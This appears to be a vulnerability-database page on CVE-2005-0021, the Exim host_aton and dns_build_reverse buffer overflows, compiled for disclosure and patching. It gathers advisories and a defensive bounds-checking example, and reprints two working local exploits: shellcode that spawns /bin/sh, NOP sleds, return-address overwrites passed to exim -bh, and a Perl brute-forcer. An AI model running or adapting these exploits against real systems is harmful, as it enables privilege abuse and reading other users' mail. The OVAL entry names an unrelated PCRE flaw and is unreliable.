CVE-2005-0021
CVSS 7.2
Published: 2005-05-02 00:00:00
Revised: 2010-08-21 00:25:22

[Original] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.


[CNNVD] Exim host_aton local buffer overflow vulnerability (CNNVD-200505-703)

A boundary-check deficiency exists in Exim's host_aton function. A local attacker can use it to overflow a buffer in the program and possibly execute arbitrary instructions with the privileges of the process.
host_aton does not adequately limit the number of elements it stores in a fixed-size array. The elements come from a user-controlled string passed in through a command-line option, so a crafted string may lead to execution of arbitrary instructions with the privileges of the process.

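As an added illustration (not Exim's code and not taken from any of the sources quoted on this page), the C sketch below shows the two bounds the advisories describe as missing: a component-count check while converting an IPv6 string into 16-bit words, which is what host_aton needed, and size-bounded writes while building the ip6.arpa reverse-lookup name from that address, the operation dns_build_reverse performs. The names parse_ipv6_bounded, build_reverse_name and IPV6_WORDS, the simplified grammar (no "::" compression, no zone id) and the sample addresses are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define IPV6_WORDS 8
/* 32 nibbles, each followed by '.', then "ip6.arpa" and its terminator. */
#define REVERSE_NAME_LEN (32 * 2 + sizeof("ip6.arpa"))
/* Parse an uncompressed IPv6 address (eight colon-separated groups of 1-4
 * hex digits) into eight 16-bit words. Returns 8 on success, -1 on any
 * malformed input. The check before each store is the bound the page says
 * host_aton lacked: a ninth component is refused, never written past out[]. */
int parse_ipv6_bounded(const char *text, unsigned short out[IPV6_WORDS]) {
    int n = 0;
    const char *p = text;
    for (;;) {
        int digits = 0;
        unsigned v = 0;
        while (isxdigit((unsigned char)p[digits])) digits++;
        if (digits == 0 || digits > 4) return -1;  /* empty or oversized group */
        if (n >= IPV6_WORDS) return -1;            /* more than 8 components */
        for (int d = 0; d < digits; d++) {
            unsigned char c = (unsigned char)p[d];
            v = v * 16 + (isdigit(c) ? c - '0' : tolower(c) - 'a' + 10);
        }
        out[n++] = (unsigned short)v;
        p += digits;
        if (*p == '\0') break;
        if (*p != ':') return -1;
        p++;
    }
    return n == IPV6_WORDS ? n : -1;               /* too few components */
}

/* Build the ip6.arpa name for a parsed address. Every write is bounded by
 * the caller's buffer size; a buffer below the fixed maximum is refused. */
int build_reverse_name(const unsigned short w[IPV6_WORDS], char *buf, size_t len) {
    size_t pos = 0;
    if (len < REVERSE_NAME_LEN) return -1;
    for (int i = IPV6_WORDS - 1; i >= 0; i--)          /* least significant first */
        for (int shift = 0; shift < 16; shift += 4)
            pos += (size_t)snprintf(buf + pos, len - pos, "%x.", (w[i] >> shift) & 0xf);
    snprintf(buf + pos, len - pos, "ip6.arpa");
    return 0;
}

int main(void) {
    unsigned short w[IPV6_WORDS];
    char name[REVERSE_NAME_LEN];
    const char *ok = "2001:db8:0:0:0:0:0:1";   /* constructed sample address */
    const char *bad = "1:2:3:4:5:6:7:8:9";     /* constructed: nine components */
    printf("%s -> %d\n", ok, parse_ipv6_bounded(ok, w));
    if (build_reverse_name(w, name, sizeof name) == 0) printf("%s\n", name);
    printf("%s -> %d (rejected)\n", bad, parse_ipv6_bounded(bad, w));
    return 0;
}
```
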
- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/a:university_of_cambridge:exim:4.40
cpe:/a:university_of_cambridge:exim:4.41
cpe:/a:university_of_cambridge:exim:4.42

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10347 Perl-Compatible Regular Expression (PCRE) library before 7.3 allows context-dependent attackers to cause a denial of service (crash) and pos...
*OVAL describes in detail how to detect this vulnerability; the related OVAL definition contains further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0021
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0021
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-703
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/132992
(PATCH)  CERT-VN  VU#132992
http://www.redhat.com/support/errata/RHSA-2005-025.html
(PATCH)  REDHAT  RHSA-2005:025
http://www.idefense.com/application/poi/display?id=183&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050114 Exim dns_build_reverse() Buffer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=179&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050107 Exim host_aton() Buffer Overflow Vulnerability
http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.html
(UNKNOWN)  MLIST  [exim] 20050104 2 smallish security issues
http://www.debian.org/security/2005/dsa-637
(VENDOR_ADVISORY)  DEBIAN  DSA-637
http://www.debian.org/security/2005/dsa-635
(VENDOR_ADVISORY)  DEBIAN  DSA-635
http://security.gentoo.org/glsa/glsa-200501-23.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200501-23
http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44
(UNKNOWN)  CONFIRM  http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44

- Vulnerability information

Exim host_aton local buffer overflow vulnerability
High severity; buffer overflow
Published: 2005-05-02 00:00:00; updated: 2005-10-20 00:00:00
Local

- Advisories and patches

The vendor has released an upgrade patch that fixes this security issue; patch download link:
http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html

- Vulnerability information (EDB 756)

Exim <= 4.41 dns_build_reverse Local Exploit PoC (EDBID:756)
Platform: linux; type: local
Date: 2005-01-15; verified
Author: Rafael Carrasco
/*
This proof-of-concept demonstrates the existence of the vulnerability
reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
It has been tested against exim-4.41 under Debian GNU/Linux.
Note that setuid () is not included in the shellcode to avoid
script-kidding.
My RET is 0xbffffae4, but fb.pl can brute-force it for you.

-----------
Brute Force fb.pl:
-----------

#!/usr/bin/perl

$cnt = 0xbffffa10;

while (1) {
   $hex = sprintf ("0x%x", $cnt);
   $res = system ("./exploit $hex");
   printf "$hex : $res\n";
   $cnt += 4;
}

---------
exploit.c:
---------
*/

#define NOP 0x90
#define TAMBUF 368
#define INIC_SH 20
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main (int argc, char **argv) {

   static char shellcode[]=
   "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
   "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
   "\x2f\x73\x68\x58";

   char buffer [TAMBUF + 1];
   char cadena [TAMBUF + 5];
   int cont;
   unsigned long ret = strtoul (argv[1], NULL, 16);

   /* fill the buffer with the return address (assumes a 32-bit long) */
   for (cont = 0; cont < TAMBUF / 4; cont++)
           *( (long *) buffer + cont) = ret;

   /* place the shellcode after the NOP sled */
   for (cont = 0; cont < strlen (shellcode); cont++)
           buffer [cont + INIC_SH] = shellcode [cont];

   for (cont = 0; cont < INIC_SH; cont++)
           buffer [cont] = NOP;

   buffer [TAMBUF] = 0;
   printf ("RET = 0x%lx\n", ret);
   strcpy (cadena, "::%A");
   strcat (cadena, buffer);
   execl ("/usr/sbin/exim", "./exim", "-bh", cadena, (char *) 0);
   return 1;   /* only reached if execl fails */
}

// milw0rm.com [2005-01-15]

- Vulnerability information (EDB 1009)

Exim <= 4.41 dns_build_reverse Local Exploit (EDBID:1009)
Platform: linux; type: local
Date: 2005-05-25; verified
Author: Plugger
/* 
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 * 
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people's emails ....
 * 
 * not even my own shellcode. aleph1 shellcode - cut and paste job 
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 * 
 * 
 */

#include <stdio.h>
#include <unistd.h>

/* 288 bytes of payload plus the terminating NUL */
char bomb[289]=

/* the gear from iDEFENSE */
"::%A:::::::::::::::::"                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"                                          /* 218 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"  /* 12 bytes  */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"  /* 12 bytes  */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"              /* 9 bytes   */
"\xe8\xdc\xff\xff\xff/bin/sh"                       /* 12 bytes  */

/* where EIP should point */
"\xf4\xf2\xff\xbf";                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 288 bytes */
                                                    /* ========= */
int main(void)
{
  char *exim[4];
  exim[0] = "/usr/exim/bin/exim";
  exim[1] = "-bh";
  exim[2] = bomb;
  exim[3] = NULL;
  printf("Firing up exim - cross your fingers for shell!\n");
  execve(exim[0], exim, NULL);
  return 1;   /* only reached if execve fails */
}

// milw0rm.com [2005-05-25]

- Vulnerability information (F35726)

dsa-637.txt (PacketStormID:F35726)
2005-01-16 00:00:00
Tags: advisory, overflow, arbitrary
Systems: linux, debian
CVE-2005-0021

Debian Security Advisory 637-1 - Philip Hazel announced a buffer overflow in the host_aton function in exim-tls, the SSL-enabled version of the default mail-transport-agent in Debian, which can lead to the execution of arbitrary code via an illegal IPv6 address.


--------------------------------------------------------------------------
Debian Security Advisory DSA 637-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
January 13th, 2005                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : exim-tls
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-0021
Debian Bug     : 289046

Philip Hazel announced a buffer overflow in the host_aton function in
exim-tls, the SSL-enabled version of the default mail-transport-agent
in Debian, which can lead to the execution of arbitrary code via an
illegal IPv6 address.

For the stable distribution (woody) this problem has been fixed in
version 3.35-3woody3.

In the unstable distribution (sid) this package does not exist
anymore.

We recommend that you upgrade your exim-tls package.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
--------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>


- Vulnerability information (F35647)

IDEF0725.txt (PacketStormID:F35647)
2005-01-11 00:00:00
Tags: advisory, overflow, arbitrary, local
CVE-2005-0021

iDEFENSE Security Advisory IDEF0725 - Local exploitation of a buffer overflow vulnerability in Exim 4.41 may allow execution of arbitrary commands with elevated privileges. The problem specifically exists in the host_aton function. The function fails to check the number of elements it stores in a fixed size array. The elements come from a user-controlled string and are passed into the program from a command line option.

Exim host_aton() Buffer Overflow Vulnerability

iDEFENSE Security Advisory [IDEF0725]
http://www.idefense.com/application/poi/display?type=vulnerabilities
January 07, 2005

I. BACKGROUND

Exim is a message transfer agent developed for use on Unix systems. More
information is available at:

	http://www.exim.org/

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in Exim 4.41 may 
allow execution of arbitrary commands with elevated privileges.

The problem specifically exists in the host_aton function. The function 
fails to check the number of elements it stores in a fixed size array. 
The elements come from a user-controlled string and are passed into the 
program from a command line option.

III. ANALYSIS

Exploitation of this vulnerability will give an attacker access to the 
mailer uid. The exim mailer is setuid root, but drops privileges before 
the vulnerable code is reached. Having the mailer uid may allow access 
to sensitive information in e-mail messages or possibly further 
elevation.

IV. DETECTION

Exim versions 4.40 and 4.41 have been confirmed vulnerable. The source 
code for version 4.42 suggests that it is also vulnerable. It is 
suspected that previous versions are vulnerable.

V. WORKAROUND

iDEFENSE is currently unaware of any effective workarounds for this 
vulnerability.

VI. VENDOR RESPONSE

A patch for Exim release 4.43 which addresses this vulnerability is
available at:

   http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html

The patch will be incorporated into a future Exim release (4.50).

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2005-0021 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/23/2004  Initial vendor notification
12/29/2004  Initial vendor response
01/07/2005  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

- Vulnerability information

OSVDB ID: 12726
Exim -be Command Line Option host_aton Function Local Overflow
Location: Remote / Network Access; attack type: Input Manipulation
Impact: Loss of Integrity
Exploit: Unknown

- Vulnerability description

A remote overflow exists in Exim. Exim fails to properly check input to host_aton() resulting in a buffer overflow. With a specially crafted request of an IPv6 address with more than 8 components, an attacker can cause execution of arbitrary code resulting in a loss of integrity.

- Timeline

Disclosure date: 2005-01-06; discovery date: 2004-12-23
Exploit publish date: Unknown; solution date: Unknown

- Solution

Upgrade to version 4.44 or higher, as it has been reported to fix this vulnerability. In addition, Exim has released a patch for some older versions.

- Vulnerability information

Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
Class: Boundary Condition Error; Bugtraq ID: 12268
Remote: No; Local: Yes
Published: 2005-01-14 12:00:00; updated: 2009-07-12 09:27:00
The individual or individuals responsible for the discovery of this issue wish to remain anonymous.

- Affected program versions

University of Cambridge Exim 4.43
University of Cambridge Exim 4.42
University of Cambridge Exim 4.41
University of Cambridge Exim 4.40
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
ALT Linux ALT Linux Junior 2.3
ALT Linux ALT Linux Compact 2.3

- Vulnerability discussion

A local buffer overflow vulnerability triggered by an excessively long command line argument affects Exim. This issue is due to a failure of the application to validate the length of user-supplied data prior to attempting to store it in process buffers.

An attacker may leverage this issue to execute arbitrary code with the privileges of the affected mailer application. As the application is a setuid application, it is possible that further privilege escalation may occur.

- Exploits

The following proof-of-concept exploits have been made available by Rafael San Miguel Carrasco <smcsoc@yahoo.es> (eximExploit.tar.gz), pi3ki31ny (p_exim.c), and Tony Lockett "plugger" <plug@internode.on.net> (exim-exploit.c).

- Solution

The University of Cambridge has reportedly released a patch dealing with this issue, although this is not confirmed. Users are advised to contact the vendor for more information.

SuSE Linux has released a security summary report (SUSE-SR:2005:002) that contains fixes to address this and other vulnerabilities. Customers are advised to peruse the referenced advisory for further information regarding obtaining and applying appropriate updates.

ALT Linux has released updates dealing with this and other issues. Please see the reference section for more information.


University of Cambridge Exim 4.42
